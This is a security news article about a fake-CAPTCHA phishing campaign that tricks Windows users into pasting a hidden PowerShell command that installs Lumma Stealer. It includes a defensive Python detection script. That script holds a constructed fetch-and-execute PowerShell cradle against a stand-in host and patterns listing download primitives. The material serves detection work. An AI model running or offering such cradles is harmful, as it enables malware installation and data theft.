- Phishing campaign imitates CAPTCHA to deliver hidden malware commands
- Hidden PowerShell Command in Verification Leads to Lumma Stealer Attack
- Educating users about phishing tactics is key to preventing such attacks
CloudSEK has discovered a sophisticated method of distributing Lumma Stealer malware that poses a serious threat to Windows users.
This technique relies on deceptive human verification pages that trick users into unintentionally executing harmful commands.
Although the campaign primarily focuses on spreading Lumma Stealer malware, its methodology could potentially be adapted to spread a wide variety of other malware.
How the phishing campaign works
The campaign hosts its phishing pages on trusted platforms such as Amazon S3 and various content delivery networks (CDNs), and it uses modular malware delivery: the initial executable downloads additional components or modules, which complicates detection and analysis.
The infection chain in this phishing campaign begins when malicious actors lure victims to phishing websites that mimic legitimate Google CAPTCHA verification pages. These pages are presented as a necessary identity verification step, tricking users into thinking they are performing a standard security check.
The attack takes a more deceptive turn once the user clicks the “Verify” button. Behind the scenes, a hidden JavaScript function activates, copying a base64-encoded PowerShell command to the user’s clipboard without their knowledge. The phishing page then asks the user to perform a series of unusual steps, such as opening the Run dialog box (Win+R) and pasting the copied command. When the user follows these instructions, the PowerShell command runs in a hidden window, so the victim sees nothing and is unlikely to notice that anything has executed.
The hidden PowerShell command is at the heart of the attack. It connects to a remote server to download additional content, such as a text file (a.txt) containing instructions to retrieve and execute the Lumma Stealer malware. Once the malware is installed on the system, it establishes connections with domains controlled by the attackers. This allows the attackers to compromise the system, steal sensitive data, and potentially launch other malicious activities.
To guard against this phishing campaign, users and organizations should prioritize security awareness and implement proactive defenses. A crucial first step is user education.
The deceptive nature of these attacks – disguised as legitimate verification processes – highlights the importance of informing users of the dangers of following suspicious prompts, especially when asked to copy and paste unknown commands. Users should be trained to recognize phishing tactics and question unexpected CAPTCHA checks or unknown instructions involving the execution of system commands.
In addition to training, deploying robust endpoint protection is essential to defend against PowerShell-based attacks. Since the attackers in this campaign rely heavily on PowerShell to execute malicious code, organizations should ensure their security solutions are capable of detecting and blocking these activities. Advanced endpoint protection tools with behavioral analysis and real-time monitoring can detect unusual command executions, helping prevent the download and installation of malware.
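The chain described above (Run dialog, hidden PowerShell window, base64-encoded command, download of a text file that is then executed) leaves a distinctive process-creation footprint, and that footprint is what a behavioral endpoint or SIEM rule keys on. The Python script below is an example added here for illustration; it is not code from CloudSEK or from the article. It scores records shaped like Windows Security event 4688 (process creation with command-line auditing enabled): PowerShell spawned by explorer.exe, a hidden window style, an -EncodedCommand payload, and a download cradle inside the decoded payload. The sample events, the cradle text, the host example.invalid (a reserved TLD that resolves nowhere) and the alert threshold are all constructed for the example. It goes slightly beyond the article by also flagging an unencoded cradle typed directly into the Run dialog.

```python
import base64
import re

# Constructed sample payload of the kind the article describes: fetch a text file,
# then evaluate its contents. The host is in the reserved .invalid TLD.
CONSTRUCTED_PAYLOAD = "iwr 'http://example.invalid/a.txt' -UseBasicParsing | iex"


def encode_ps(command):
    """Encode a command the way powershell.exe -EncodedCommand expects: UTF-16LE, then base64."""
    return base64.b64encode(command.encode("utf-16-le")).decode("ascii")


# powershell.exe accepts -EncodedCommand, its alias -ec, and any unambiguous prefix (-e, -enc, ...).
_ENC_SWITCHES = "|".join(["ec"] + ["encodedcommand"[:i] for i in range(1, 15)])
_ENC_RE = re.compile(r"(?:^|\s)-(?:" + _ENC_SWITCHES + r")\s+([A-Za-z0-9+/=]{8,})", re.IGNORECASE)
# -w hidden / -WindowStyle hidden (prefixes of -WindowStyle are also accepted by PowerShell)
_HIDDEN_RE = re.compile(r"(?:^|\s)-w[indowstyle]*\s+hidden\b", re.IGNORECASE)
# Common download-and-execute primitives ("cradles") seen in one-liners
_CRADLE_RE = re.compile(
    r"\b(iwr|invoke-webrequest|invoke-restmethod|irm|downloadstring|downloadfile|"
    r"net\.webclient|invoke-expression|iex|start-bitstransfer|curl|wget)\b", re.IGNORECASE)


def decode_encoded_command(command_line):
    """Return the decoded -EncodedCommand payload, or None if absent or not valid base64/UTF-16LE."""
    m = _ENC_RE.search(command_line)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def assess_process_event(evt):
    """Score one 4688-style process-creation record; returns (score, reasons).

    Each piece of the fake-CAPTCHA chain adds one point. No single indicator is
    conclusive (admins use encoded commands too); the combination is what matters.
    """
    reasons = []
    image = evt.get("NewProcessName", "").lower()
    parent = evt.get("ParentProcessName", "").lower()
    cmd = evt.get("CommandLine", "")
    if not (image.endswith("\\powershell.exe") or image.endswith("\\pwsh.exe")):
        return 0, reasons
    if parent.endswith("\\explorer.exe"):
        reasons.append("powershell spawned by explorer.exe (consistent with the Win+R Run dialog)")
    if _HIDDEN_RE.search(cmd):
        reasons.append("window style hidden")
    decoded = decode_encoded_command(cmd)
    if decoded is not None:
        reasons.append("encoded command present")
        hits = sorted({h.lower() for h in _CRADLE_RE.findall(decoded)})
        if hits:
            reasons.append("download cradle in decoded payload: " + ", ".join(hits))
    elif _CRADLE_RE.search(cmd):
        reasons.append("download cradle in plain command line")
    return len(reasons), reasons


SUSPICIOUS_THRESHOLD = 3  # constructed tuning value: three independent indicators


def find_suspicious(events, threshold=SUSPICIOUS_THRESHOLD):
    """Return [(index, score, reasons)] for every event at or above the threshold."""
    out = []
    for i, evt in enumerate(events):
        score, reasons = assess_process_event(evt)
        if score >= threshold:
            out.append((i, score, reasons))
    return out


# Constructed sample records modelled on event 4688 fields; not captured from the campaign.
_PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
SAMPLE_EVENTS = [
    # 0: benign - an operator runs a script from a console
    {"ParentProcessName": r"C:\Windows\System32\cmd.exe", "NewProcessName": _PS,
     "CommandLine": r"powershell.exe -ExecutionPolicy Bypass -File C:\ops\backup.ps1"},
    # 1: the fake-CAPTCHA chain - explorer.exe (Run dialog) -> hidden window -> encoded cradle
    {"ParentProcessName": r"C:\Windows\explorer.exe", "NewProcessName": _PS,
     "CommandLine": "powershell.exe -w hidden -enc " + encode_ps(CONSTRUCTED_PAYLOAD)},
    # 2: encoded but otherwise unremarkable - a service-launched one-liner with no download
    {"ParentProcessName": r"C:\Windows\System32\svchost.exe", "NewProcessName": _PS,
     "CommandLine": "powershell.exe -EncodedCommand " + encode_ps("Get-Service | Out-File C:\\ops\\svc.txt")},
]

if __name__ == "__main__":
    for i, score, reasons in find_suspicious(SAMPLE_EVENTS):
        print(f"event {i}: score {score}")
        for r in reasons:
            print("   -", r)
```

Decoding the encoded argument before matching matters: a rule that only looks at the raw command line sees base64 and nothing else, which is exactly why the attackers encode the payload. In production the same checks map onto PowerShell script block logging (event 4104), which records the decoded script regardless of how it was launched.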
Organizations should also take a proactive approach by monitoring network traffic for suspicious activity. Security teams should pay particular attention to connections with newly registered or uncommon domains, which are often used by attackers to distribute malware or steal sensitive data.
Finally, keeping systems up to date with the latest patches is a crucial defense mechanism. Regular updates ensure that known vulnerabilities are patched, limiting the ability of attackers to exploit outdated software in their efforts to distribute malware like Lumma Stealer. Note that this particular chain exploits no software vulnerability; the victim runs the command themselves, so patching limits the follow-on damage rather than preventing the initial execution.
“This new tactic is particularly dangerous because it undermines users’ trust in the widely recognized CAPTCHA checks they regularly encounter online. By hiding malicious activity behind what appears to be a routine security check, attackers can easily trick users into running harmful commands on their computers. What is more concerning is that this technique, which currently distributes Lumma Stealer, could be adapted to spread other types of malware, making it a very versatile and scalable threat,” said Anshuman Das, researcher at CloudSEK.